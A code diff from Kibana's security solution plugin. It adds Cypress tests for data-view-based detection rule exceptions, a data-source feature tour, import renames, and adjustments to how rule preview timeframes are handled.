b/x-pack/plugins/security_solution/cypress/integration/exceptions/add_edit_data_view_exception.spec.ts @@ -0,0 +1,159 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { getException } from '../../objects/exception'; +import { getNewRule } from '../../objects/rule'; + +import { ALERTS_COUNT, EMPTY_ALERT_TABLE, NUMBER_OF_ALERTS } from '../../screens/alerts'; + +import { addExceptionFromFirstAlert, goToClosedAlerts, goToOpenedAlerts } from '../../tasks/alerts'; +import { createCustomRuleEnabled } from '../../tasks/api_calls/rules'; +import { goToRuleDetails } from '../../tasks/alerts_detection_rules'; +import { waitForAlertsToPopulate } from '../../tasks/create_new_rule'; +import { esArchiverLoad, esArchiverUnload, esArchiverResetKibana } from '../../tasks/es_archiver'; +import { login, visitWithoutDateRange } from '../../tasks/login'; +import { + addsException, + addsExceptionFromRuleSettings, + editException, + goToAlertsTab, + goToExceptionsTab, + removeException, + waitForTheRuleToBeExecuted, +} from '../../tasks/rule_details'; + +import { DETECTIONS_RULE_MANAGEMENT_URL } from '../../urls/navigation'; +import { deleteAlertsAndRules, postDataView } from '../../tasks/common'; +import { + EXCEPTION_EDIT_FLYOUT_SAVE_BTN, + EXCEPTION_ITEM_CONTAINER, + FIELD_INPUT, +} from '../../screens/exceptions'; +import { + addExceptionEntryFieldValueOfItemX, + addExceptionEntryFieldValueValue, +} from '../../tasks/exceptions'; + +describe('Adds rule exception using data views', () => { + const NUMBER_OF_AUDITBEAT_EXCEPTIONS_ALERTS = '1 alert'; + + before(() => { + esArchiverResetKibana(); + esArchiverLoad('exceptions'); + login(); + + postDataView('exceptions-*'); + }); + + beforeEach(() => { + deleteAlertsAndRules(); + createCustomRuleEnabled( + { + ...getNewRule(), + customQuery: 'agent.name:*', + dataSource: { dataView: 'exceptions-*', type: 'dataView' }, + }, + 'rule_testing', + '1s' + ); + visitWithoutDateRange(DETECTIONS_RULE_MANAGEMENT_URL); + goToRuleDetails(); + waitForTheRuleToBeExecuted(); + waitForAlertsToPopulate(); + }); + + afterEach(() => { + esArchiverUnload('exceptions_2'); + }); + + after(() => { + esArchiverUnload('exceptions'); + }); + + it('Creates an exception from an alert and deletes it', () => { + cy.get(ALERTS_COUNT).should('exist'); + cy.get(NUMBER_OF_ALERTS).should('have.text', NUMBER_OF_AUDITBEAT_EXCEPTIONS_ALERTS); + // Create an exception from the alerts actions menu that matches + // the existing alert + addExceptionFromFirstAlert(); + addsException(getException()); + + // Alerts table should now be empty from having added exception and closed + // matching alert + cy.get(EMPTY_ALERT_TABLE).should('exist'); + + // Closed alert should appear in table + goToClosedAlerts(); + cy.get(ALERTS_COUNT).should('exist'); + cy.get(NUMBER_OF_ALERTS).should('have.text', `${NUMBER_OF_AUDITBEAT_EXCEPTIONS_ALERTS}`); + + // Remove the exception and load an event that would have matched that exception + // to show that said exception now starts to show up again + goToExceptionsTab(); + removeException(); + esArchiverLoad('exceptions_2'); + goToAlertsTab(); + goToOpenedAlerts(); + waitForTheRuleToBeExecuted(); + waitForAlertsToPopulate(); + + cy.get(ALERTS_COUNT).should('exist'); + cy.get(NUMBER_OF_ALERTS).should('have.text', `${NUMBER_OF_AUDITBEAT_EXCEPTIONS_ALERTS}`); + }); + + it('Creates an exception from a rule and deletes it', () => { + // Create an exception from the exception tab that matches + // the existing alert + goToExceptionsTab(); + addsExceptionFromRuleSettings(getException()); + + // Alerts table should now be empty from having added exception and closed + // matching alert + goToAlertsTab(); + cy.get(EMPTY_ALERT_TABLE).should('exist'); + + // Closed alert should appear in table + goToClosedAlerts(); + cy.get(ALERTS_COUNT).should('exist'); + cy.get(NUMBER_OF_ALERTS).should('have.text', `${NUMBER_OF_AUDITBEAT_EXCEPTIONS_ALERTS}`); + + // Remove the exception and load an event that would have matched that exception + // to show that said exception now starts to show up again + goToExceptionsTab(); + removeException(); + esArchiverLoad('exceptions_2'); + goToAlertsTab(); + goToOpenedAlerts(); + waitForTheRuleToBeExecuted(); + waitForAlertsToPopulate(); + + cy.get(ALERTS_COUNT).should('exist'); + cy.get(NUMBER_OF_ALERTS).should('have.text', `${NUMBER_OF_AUDITBEAT_EXCEPTIONS_ALERTS}`); + }); + + it('Edits an exception', () => { + goToExceptionsTab(); + addsExceptionFromRuleSettings(getException()); + + editException(); + + // check that the existing item's field is being populated + cy.get(EXCEPTION_ITEM_CONTAINER) + .eq(0) + .find(FIELD_INPUT) + .eq(0) + .should('have.text', 'agent.name'); + + // check that you can select a different field + addExceptionEntryFieldValueOfItemX('user.name{downarrow}{enter}', 0, 0); + addExceptionEntryFieldValueValue('test', 0); + + cy.get(EXCEPTION_EDIT_FLYOUT_SAVE_BTN).click(); + cy.get(EXCEPTION_EDIT_FLYOUT_SAVE_BTN).should('have.attr', 'disabled'); + cy.get(EXCEPTION_EDIT_FLYOUT_SAVE_BTN).should('not.exist'); + }); +}); diff --git a/x-pack/plugins/security_solution/cypress/tasks/api_calls/rules.ts b/x-pack/plugins/security_solution/cypress/tasks/api_calls/rules.ts index 0ef07195b3309..655efbd2353fc 100644 --- a/x-pack/plugins/security_solution/cypress/tasks/api_calls/rules.ts +++ b/x-pack/plugins/security_solution/cypress/tasks/api_calls/rules.ts @@ -154,6 +154,31 @@ export const createCustomRuleEnabled = ( headers: { 'kbn-xsrf': 'cypress-creds' }, failOnStatusCode: false, }); + } else if (rule.dataSource.type === 'dataView') { + cy.request({ + method: 'POST', + url: 'api/detection_engine/rules', + body: { + rule_id: ruleId, + risk_score: parseInt(rule.riskScore, 10), + description: rule.description, + interval, + name: rule.name, + severity: rule.severity.toLocaleLowerCase(), + type: 'query', + from: 'now-50000h', + index: [], + data_view_id: rule.dataSource.dataView, + query: rule.customQuery, + language: 'kuery', + enabled: true, + tags: ['rule1'], + max_signals: maxSignals, + building_block_type: rule.buildingBlockType, + }, + headers: { 'kbn-xsrf': 'cypress-creds' }, + failOnStatusCode: false, + }); } }; diff --git a/x-pack/plugins/security_solution/cypress/tasks/common.ts b/x-pack/plugins/security_solution/cypress/tasks/common.ts index 4982053648667..cd9525e95b0b2 100644 --- a/x-pack/plugins/security_solution/cypress/tasks/common.ts +++ b/x-pack/plugins/security_solution/cypress/tasks/common.ts @@ -185,6 +185,7 @@ export const postDataView = (dataSource: string) => { url: `/api/index_patterns/index_pattern`, body: { index_pattern: { + id: dataSource, fieldAttrs: '{}', title: dataSource, timeFieldName: '@timestamp', diff --git a/x-pack/plugins/security_solution/cypress/tasks/login.ts b/x-pack/plugins/security_solution/cypress/tasks/login.ts index a86948b383385..15f009614b07f 100644 --- a/x-pack/plugins/security_solution/cypress/tasks/login.ts +++ b/x-pack/plugins/security_solution/cypress/tasks/login.ts @@ -10,7 +10,7 @@ import type { UrlObject } from 'url'; import Url from 'url'; import type { ROLES } from '../../common/test'; -import { RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY } from '../../common/constants'; +import { NEW_FEATURES_TOUR_STORAGE_KEYS } from '../../common/constants'; import { TIMELINE_FLYOUT_BODY } from '../screens/timeline'; import { hostDetailsUrl, LOGOUT_URL, userDetailsUrl } from '../urls/navigation'; @@ -287,18 +287,20 @@ export const getEnvAuth = (): User => { }; /** - * Saves in localStorage rules feature tour config with deactivated option - * It prevents tour to appear during tests and cover UI elements + * For all the new features tours we show in the app, this method disables them + * by setting their configs in the local storage. It prevents the tours from appearing + * on the page during test runs and covering other UI elements. * @param window - browser's window object */ -const disableFeatureTourForRuleManagementPage = (window: Window) => { +const disableNewFeaturesTours = (window: Window) => { + const tourStorageKeys = Object.values(NEW_FEATURES_TOUR_STORAGE_KEYS); const tourConfig = { isTourActive: false, }; - window.localStorage.setItem( - RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY, - JSON.stringify(tourConfig) - ); + + tourStorageKeys.forEach((key) => { + window.localStorage.setItem(key, JSON.stringify(tourConfig)); + }); }; /** @@ -326,7 +328,7 @@ export const visit = ( if (onBeforeLoadCallback) { onBeforeLoadCallback(win); } - disableFeatureTourForRuleManagementPage(win); + disableNewFeaturesTours(win); }, } ); @@ -334,20 +336,20 @@ export const visit = ( export const visitWithoutDateRange = (url: string, role?: ROLES) => { cy.visit(role ? getUrlWithRoute(role, url) : url, { - onBeforeLoad: disableFeatureTourForRuleManagementPage, + onBeforeLoad: disableNewFeaturesTours, }); }; export const visitWithUser = (url: string, user: User) => { cy.visit(constructUrlWithUser(user, url), { - onBeforeLoad: disableFeatureTourForRuleManagementPage, + onBeforeLoad: disableNewFeaturesTours, }); }; export const visitTimeline = (timelineId: string, role?: ROLES) => { const route = `/app/security/timelines?timeline=(id:'${timelineId}',isOpen:!t)`; cy.visit(role ? getUrlWithRoute(role, route) : route, { - onBeforeLoad: disableFeatureTourForRuleManagementPage, + onBeforeLoad: disableNewFeaturesTours, }); cy.get('[data-test-subj="headerGlobalNav"]'); cy.get(TIMELINE_FLYOUT_BODY).should('be.visible'); diff --git a/x-pack/plugins/security_solution/public/app/home/template_wrapper/bottom_bar/index.tsx b/x-pack/plugins/security_solution/public/app/home/template_wrapper/bottom_bar/index.tsx index 407c0db35f49d..123ae4563f756 100644 --- a/x-pack/plugins/security_solution/public/app/home/template_wrapper/bottom_bar/index.tsx +++ b/x-pack/plugins/security_solution/public/app/home/template_wrapper/bottom_bar/index.tsx @@ -8,7 +8,7 @@ /* eslint-disable react/display-name */ import React from 'react'; -import type { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { KibanaPageTemplateProps } from '@kbn/shared-ux-page-kibana-template'; import type { AppLeaveHandler } from '@kbn/core/public'; import { TimelineId } from '../../../../../common/types/timeline'; import { AutoSaveWarningMsg } from '../../../../timelines/components/timeline/auto_save_warning'; diff --git a/x-pack/plugins/security_solution/public/app/home/template_wrapper/index.tsx b/x-pack/plugins/security_solution/public/app/home/template_wrapper/index.tsx index 21db51173ca20..79c7a0899e9c6 100644 --- a/x-pack/plugins/security_solution/public/app/home/template_wrapper/index.tsx +++ b/x-pack/plugins/security_solution/public/app/home/template_wrapper/index.tsx @@ -10,7 +10,7 @@ import styled from 'styled-components'; import { EuiPanel, EuiThemeProvider, useEuiTheme } from '@elastic/eui'; import { IS_DRAGGING_CLASS_NAME } from '@kbn/securitysolution-t-grid'; import type { AppLeaveHandler } from '@kbn/core/public'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { useSecuritySolutionNavigation } from '../../../common/components/navigation/use_security_solution_navigation'; import { TimelineId } from '../../../../common/types/timeline'; import { getTimelineShowStatusByIdSelector } from '../../../timelines/components/flyout/selectors'; diff --git a/x-pack/plugins/security_solution/public/common/components/events_viewer/selectors/mock_state.ts b/x-pack/plugins/security_solution/public/common/components/events_viewer/selectors/mock_state.ts index 4b51ae9f329a7..3d54f078e7087 100644 --- a/x-pack/plugins/security_solution/public/common/components/events_viewer/selectors/mock_state.ts +++ b/x-pack/plugins/security_solution/public/common/components/events_viewer/selectors/mock_state.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { pipe } from 'lodash/fp'; import { mockGlobalState } from '../../../mock'; diff --git a/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/index.test.tsx b/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/index.test.tsx index 1387de4b50a67..2062765d64a0f 100644 --- a/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/index.test.tsx +++ b/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/index.test.tsx @@ -6,7 +6,7 @@ */ import { renderHook } from '@testing-library/react-hooks'; -import type { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { KibanaPageTemplateProps } from '@kbn/shared-ux-page-kibana-template'; import { useKibana } from '../../../lib/kibana/kibana_react'; import { useGetUserCasesPermissions } from '../../../lib/kibana'; import { SecurityPageName } from '../../../../app/types'; diff --git a/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/use_primary_navigation.tsx b/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/use_primary_navigation.tsx index 7196431bd77af..9e83ae9339dcd 100644 --- a/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/use_primary_navigation.tsx +++ b/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/use_primary_navigation.tsx @@ -8,7 +8,7 @@ import React, { useEffect, useState, useCallback } from 'react'; import { i18n } from '@kbn/i18n'; -import type { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { KibanaPageTemplateProps } from '@kbn/shared-ux-page-kibana-template'; import type { PrimaryNavigationProps } from './types'; import { usePrimaryNavigationItems } from './use_navigation_items'; import { useIsGroupedNavigationEnabled } from '../helpers'; diff --git a/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.test.tsx b/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.test.tsx index 224ba07cc65e5..41d57e395c102 100644 --- a/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.test.tsx +++ b/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.test.tsx @@ -9,7 +9,7 @@ import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' import { OpenInDevConsoleButton } from '.'; import { TestProviders } from '../../mock'; -jest.mock('../../../risk_score/containers/common', () => ({ +jest.mock('../../hooks/use_space_id', () => ({ useSpaceId: jest.fn().mockReturnValue('myspace'), })); diff --git a/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.tsx b/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.tsx index e56cc391e7ec7..2b8c25adf3e8f 100644 --- a/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.tsx +++ b/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.tsx @@ -6,7 +6,7 @@ */ import React from 'react'; import { EuiButton, EuiFlexItem, EuiToolTip } from '@elastic/eui'; -import { useSpaceId } from '../../../risk_score/containers/common'; +import { useSpaceId } from '../../hooks/use_space_id'; interface OpenInDevConsoleButtonProps { enableButton: boolean; diff --git a/x-pack/plugins/security_solution/public/common/components/search_bar/index.tsx b/x-pack/plugins/security_solution/public/common/components/search_bar/index.tsx index e833f1f1a5dbd..b85cd2949de59 100644 --- a/x-pack/plugins/security_solution/public/common/components/search_bar/index.tsx +++ b/x-pack/plugins/security_solution/public/common/components/search_bar/index.tsx @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import { getOr } from 'lodash/fp'; import React, { memo, useEffect, useCallback, useMemo } from 'react'; import type { ConnectedProps } from 'react-redux'; diff --git a/x-pack/plugins/security_solution/public/common/components/toasters/index.test.tsx b/x-pack/plugins/security_solution/public/common/components/toasters/index.test.tsx index bb42e99d50518..bf2249fac5c83 100644 --- a/x-pack/plugins/security_solution/public/common/components/toasters/index.test.tsx +++ b/x-pack/plugins/security_solution/public/common/components/toasters/index.test.tsx @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import { cloneDeep } from 'lodash/fp'; import { mount } from 'enzyme'; import React, { useEffect } from 'react'; diff --git a/x-pack/plugins/security_solution/public/risk_score/containers/common/index.ts b/x-pack/plugins/security_solution/public/common/hooks/use_space_id.ts similarity index 91% rename from x-pack/plugins/security_solution/public/risk_score/containers/common/index.ts rename to x-pack/plugins/security_solution/public/common/hooks/use_space_id.ts index 1277c08aee5a0..55debc6f80215 100644 --- a/x-pack/plugins/security_solution/public/risk_score/containers/common/index.ts +++ b/x-pack/plugins/security_solution/public/common/hooks/use_space_id.ts @@ -6,7 +6,7 @@ */ import { useState, useEffect } from 'react'; -import { useKibana } from '../../../common/lib/kibana'; +import { useKibana } from '../lib/kibana'; export const useSpaceId = () => { const { spaces } = useKibana().services; diff --git a/x-pack/plugins/security_solution/public/common/lib/kibana/hooks.ts b/x-pack/plugins/security_solution/public/common/lib/kibana/hooks.ts index b7c22f4398f91..4a736fc622055 100644 --- a/x-pack/plugins/security_solution/public/common/lib/kibana/hooks.ts +++ b/x-pack/plugins/security_solution/public/common/lib/kibana/hooks.ts @@ -11,7 +11,7 @@ import { useCallback, useEffect, useState, useRef } from 'react'; import { i18n } from '@kbn/i18n'; import { camelCase, isArray, isObject } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import type { AuthenticatedUser } from '@kbn/security-plugin/common/model'; import type { Capabilities, NavigateToAppOptions } from '@kbn/core/public'; import type { CasesPermissions } from '@kbn/cases-plugin/common/ui'; diff --git a/x-pack/plugins/security_solution/public/detections/components/alerts_table/timeline_actions/alert_context_menu.tsx b/x-pack/plugins/security_solution/public/detections/components/alerts_table/timeline_actions/alert_context_menu.tsx index fe2eabec1ea0b..41153cb6b188a 100644 --- a/x-pack/plugins/security_solution/public/detections/components/alerts_table/timeline_actions/alert_context_menu.tsx +++ b/x-pack/plugins/security_solution/public/detections/components/alerts_table/timeline_actions/alert_context_menu.tsx @@ -331,7 +331,7 @@ export const AddExceptionFlyoutWrapper: React.FC /** * This should be re-visited after UEBA work is merged */ - const useRuleIndices = useMemo(() => { + const memoRuleIndices = useMemo(() => { if (enrichedAlert != null && enrichedAlert['kibana.alert.rule.parameters']?.index != null) { return Array.isArray(enrichedAlert['kibana.alert.rule.parameters'].index) ? enrichedAlert['kibana.alert.rule.parameters'].index @@ -341,8 +341,8 @@ export const AddExceptionFlyoutWrapper: React.FC ? enrichedAlert.signal.rule.index : [enrichedAlert.signal.rule.index]; } - return ruleIndices; - }, [enrichedAlert, ruleIndices]); + return []; + }, [enrichedAlert]); const memoDataViewId = useMemo(() => { if ( @@ -359,7 +359,7 @@ export const AddExceptionFlyoutWrapper: React.FC { + return { + start: dateMath.parse(startDate) || moment().subtract(1, 'hour'), + end: dateMath.parse(endDate) || moment(), + }; +}; + const RulePreviewComponent: React.FC = ({ index, indexPattern, @@ -129,9 +136,20 @@ const RulePreviewComponent: React.FC = ({ } }, [spaces]); + // Raw timeframe as a string const [startDate, setStartDate] = useState('now-1h'); const [endDate, setEndDate] = useState('now'); + // Parsed timeframe as a Moment object + const [timeframeStart, setTimeframeStart] = useState(moment().subtract(1, 'hour')); + const [timeframeEnd, setTimeframeEnd] = useState(moment()); + + useEffect(() => { + const { start, end } = refreshedTimeframe(startDate, endDate); + setTimeframeStart(start); + setTimeframeEnd(end); + }, [startDate, endDate]); + const { form } = useForm({ defaultValue: advancedOptionsDefaultValue, options: { stripEmptyFields: false }, @@ -180,21 +198,22 @@ const RulePreviewComponent: React.FC = ({ const showAdvancedOptions = queryPreviewIdSelected === ADVANCED_QUERY_SELECT_ID; const advancedOptions = useMemo( () => - showAdvancedOptions && startDate && endDate && formInterval && formLookback + showAdvancedOptions && formInterval && formLookback ? { - timeframeStart: dateMath.parse(startDate) || moment().subtract(1, 'hour'), - timeframeEnd: dateMath.parse(endDate) || moment(), + timeframeStart, + timeframeEnd, interval: formInterval, lookback: formLookback, } : undefined, - [endDate, formInterval, formLookback, showAdvancedOptions, startDate] + [formInterval, formLookback, showAdvancedOptions, timeframeEnd, timeframeStart] ); const [timeFrame, setTimeFrame] = useState(defaultTimeRange); const { addNoiseWarning, createPreview, + clearPreview, isPreviewRequestInProgress, previewId, logs, @@ -228,10 +247,27 @@ const RulePreviewComponent: React.FC = ({ const { startTransaction } = useStartTransaction(); + const [isRefreshing, setIsRefreshing] = useState(false); + useEffect(() => { + if (!isRefreshing) { + return; + } + createPreview(); + setIsRefreshing(false); + }, [isRefreshing, createPreview]); + const handlePreviewClick = useCallback(() => { startTransaction({ name: SINGLE_RULE_ACTIONS.PREVIEW }); - createPreview(); - }, [createPreview, startTransaction]); + if (showAdvancedOptions) { + // Refresh timeframe on Preview button click to make sure that relative times recalculated based on current time + const { start, end } = refreshedTimeframe(startDate, endDate); + setTimeframeStart(start); + setTimeframeEnd(end); + } else { + clearPreview(); + } + setIsRefreshing(true); + }, [clearPreview, endDate, showAdvancedOptions, startDate, startTransaction]); const onTimeChange = useCallback( ({ start: newStart, end: newEnd, isInvalid }: OnTimeChangeProps) => { diff --git a/x-pack/plugins/security_solution/public/detections/components/rules/rule_preview/use_preview_route.tsx b/x-pack/plugins/security_solution/public/detections/components/rules/rule_preview/use_preview_route.tsx index d0c543e3c3a31..7c5c3e673fd2a 100644 --- a/x-pack/plugins/security_solution/public/detections/components/rules/rule_preview/use_preview_route.tsx +++ b/x-pack/plugins/security_solution/public/detections/components/rules/rule_preview/use_preview_route.tsx @@ -5,7 +5,8 @@ * 2.0. */ -import { useEffect, useState, useCallback } from 'react'; +import { useEffect, useMemo, useState, useCallback } from 'react'; +import moment from 'moment'; import type { Unit } from '@kbn/datemath'; import type { Type, ThreatMapping } from '@kbn/securitysolution-io-ts-alerting-types'; import type { FieldValueQueryBar } from '../query_bar'; @@ -60,8 +61,23 @@ export const usePreviewRoute = ({ }: PreviewRouteParams) => { const [isRequestTriggered, setIsRequestTriggered] = useState(false); + const [timeframeEnd, setTimeframeEnd] = useState(moment()); + useEffect(() => { + if (isRequestTriggered) { + setTimeframeEnd(moment()); + } + }, [isRequestTriggered, setTimeframeEnd]); + + const quickQueryOptions = useMemo( + () => ({ + timeframe: timeFrame, + timeframeEnd, + }), + [timeFrame, timeframeEnd] + ); + const { isLoading, showInvocationCountWarning, response, rule, setRule } = usePreviewRule({ - timeframe: timeFrame, + quickQueryOptions, advancedOptions, }); const [logs, setLogs] = useState(response.logs ?? []); diff --git a/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/index.tsx b/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/index.tsx index d791cafe54b15..b1c55bdecc52d 100644 --- a/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/index.tsx +++ b/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/index.tsx @@ -80,6 +80,7 @@ import { getIsRulePreviewDisabled } from '../rule_preview/helpers'; import { NewTermsFields } from '../new_terms_fields'; import { ScheduleItem } from '../schedule_item_form'; import { DocLink } from '../../../../common/components/links_to_docs/doc_link'; +import { StepDefineRuleNewFeaturesTour } from './new_features_tour'; const CommonUseField = getUseField({ component: Field }); @@ -511,10 +512,15 @@ const StepDefineRuleComponent: FC = ({ /> ); }, [kibanaDataViews]); + const DataSource = useMemo(() => { return ( - - + + = ({ ); }, [ dataSourceType, + onChangeDataSource, dataViewIndexPatternToggleButtonOptions, DataViewSelectorMemo, indexModified, handleResetIndices, - onChangeDataSource, ]); const QueryBarMemo = useMemo( @@ -679,6 +685,7 @@ const StepDefineRuleComponent: FC = ({ ) : ( <> +
+

{i18n.DATA_SOURCE_GUIDE_CONTENT}

+ + + ), + anchor: `#dataSourceSelector`, + anchorPosition: 'rightCenter' as const, + stepsTotal: 1, + onFinish: noop, + }, +]; + +export const StepDefineRuleNewFeaturesTour: FC = () => { + const { storage } = useKibana().services; + + const restoredState = useMemo( + () => ({ + ...tourConfig, + ...storage.get(TOUR_STORAGE_KEY), + }), + [storage] + ); + + const [tourSteps, , tourState] = useEuiTour(stepsConfig, restoredState); + + useEffect(() => { + const { isTourActive, currentTourStep } = tourState; + storage.set(TOUR_STORAGE_KEY, { isTourActive, currentTourStep }); + }, [tourState, storage]); + + const [shouldShowTour, setShouldShowTour] = useState(false); + + useEffect(() => { + /** + * Wait until the tour target elements are visible on the page and mount + * EuiTourStep components only after that. Otherwise, the tours would never + * show up on the page. + */ + const observer = new MutationObserver(() => { + if (document.querySelector(stepsConfig[0].anchor)) { + setShouldShowTour(true); + observer.disconnect(); + } + }); + + observer.observe(document.body, { + childList: true, + subtree: true, + }); + + return () => observer.disconnect(); + }, []); + + return shouldShowTour ? : null; +}; diff --git a/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/translations.tsx b/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/translations.tsx index 2242d679b1f28..458ab73dd1bb8 100644 --- a/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/translations.tsx +++ b/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/translations.tsx @@ -99,6 +99,27 @@ export const SOURCE = i18n.translate( } ); +export const DATA_SOURCE_GUIDE_SUB_TITLE = i18n.translate( + 'xpack.securitySolution.detections.dataSource.popover.title', + { + defaultMessage: 'Select a data source', + } +); + +export const DATA_SOURCE_GUIDE_TITLE = i18n.translate( + 'xpack.securitySolution.detections.dataSource.popover.subTitle', + { + defaultMessage: 'Data sources', + } +); + +export const DATA_SOURCE_GUIDE_CONTENT = i18n.translate( + 'xpack.securitySolution.detections.dataSource.popover.content', + { + defaultMessage: 'Rules can now query index patterns or data views.', + } +); + export const RULE_PREVIEW_TITLE = i18n.translate( 'xpack.securitySolution.detectionEngine.createRule.stepDefineRule.rulePreviewTitle', { diff --git a/x-pack/plugins/security_solution/public/detections/containers/detection_engine/rules/use_preview_rule.ts b/x-pack/plugins/security_solution/public/detections/containers/detection_engine/rules/use_preview_rule.ts index a8b12a9ebc121..ed7f4150f7349 100644 --- a/x-pack/plugins/security_solution/public/detections/containers/detection_engine/rules/use_preview_rule.ts +++ b/x-pack/plugins/security_solution/public/detections/containers/detection_engine/rules/use_preview_rule.ts @@ -8,7 +8,6 @@ import { useEffect, useMemo, useState } from 'react'; import moment from 'moment'; -import type { Unit } from '@kbn/datemath'; import { RULE_PREVIEW_FROM, RULE_PREVIEW_INTERVAL, @@ -23,7 +22,10 @@ import type { import { previewRule } from './api'; import * as i18n from './translations'; import { transformOutput } from './transforms'; -import type { AdvancedPreviewOptions } from '../../../pages/detection_engine/rules/types'; +import type { + AdvancedPreviewOptions, + QuickQueryPreviewOptions, +} from '../../../pages/detection_engine/rules/types'; import { getTimeTypeValue } from '../../../pages/detection_engine/rules/create/helpers'; const REASONABLE_INVOCATION_COUNT = 200; @@ -35,10 +37,10 @@ const emptyPreviewRule: PreviewResponse = { }; export const usePreviewRule = ({ - timeframe = 'h', + quickQueryOptions, advancedOptions, }: { - timeframe: Unit; + quickQueryOptions: QuickQueryPreviewOptions; advancedOptions?: AdvancedPreviewOptions; }) => { const [rule, setRule] = useState(null); @@ -49,7 +51,7 @@ export const usePreviewRule = ({ let interval: string = RULE_PREVIEW_INTERVAL.HOUR; let from: string = RULE_PREVIEW_FROM.HOUR; - switch (timeframe) { + switch (quickQueryOptions.timeframe) { case 'd': invocationCount = RULE_PREVIEW_INVOCATION_COUNT.DAY; interval = RULE_PREVIEW_INTERVAL.DAY; @@ -67,8 +69,11 @@ export const usePreviewRule = ({ break; } const timeframeEnd = useMemo( - () => (advancedOptions ? advancedOptions.timeframeEnd.toISOString() : moment().toISOString()), - [advancedOptions] + () => + advancedOptions + ? advancedOptions.timeframeEnd.toISOString() + : quickQueryOptions.timeframeEnd.toISOString(), + [advancedOptions, quickQueryOptions] ); if (advancedOptions) { diff --git a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/bulk_actions/utils/dry_run_result.ts b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/bulk_actions/utils/dry_run_result.ts index 7fe7a9bd86012..5a15f03b9810d 100644 --- a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/bulk_actions/utils/dry_run_result.ts +++ b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/bulk_actions/utils/dry_run_result.ts @@ -38,7 +38,7 @@ export const processDryRunResult = (response: BulkActionResponse | undefined): D */ export const transformExportDetailsToDryRunResult = (details: ExportRulesDetails): DryRunResult => { return { - succeededRulesCount: details.exported_count, + succeededRulesCount: details.exported_rules_count, failedRulesCount: details.missing_rules_count, // if there are rules that can't be exported, it means they are immutable. So we can safely put error code as immutable ruleErrors: details.missing_rules.length diff --git a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/README.md b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/README.md index 025a2e0c215d5..95628008407cd 100644 --- a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/README.md +++ b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/README.md @@ -16,12 +16,12 @@ New features and fixes to track: ## How to revive this tour for the next release (if needed) -1. Update Kibana version in `RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY`. +1. Update Kibana version in `NEW_FEATURES_TOUR_STORAGE_KEYS.RULE_MANAGEMENT_PAGE`. Set it to a version you're going to implement a feature tour for. 2. Define the steps for your tour. See `RulesFeatureTour` and `stepsConfig`. -3. Define and set an anchor `id` for every step's target HTML element. +3. Define and set an anchor `id` for every step's target HTML element. 4. Render `RulesFeatureTour` component somewhere on the Rule Management page. Only one instance of that component should be present on the page. diff --git a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/rules_feature_tour.tsx b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/rules_feature_tour.tsx index 5f906c2cc8a8a..9558aab5239bb 100644 --- a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/rules_feature_tour.tsx +++ b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/rules_feature_tour.tsx @@ -23,7 +23,7 @@ import { import { noop } from 'lodash'; import type { FC } from 'react'; import React, { useEffect, useMemo, useState } from 'react'; -import { RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY } from '../../../../../../../common/constants'; 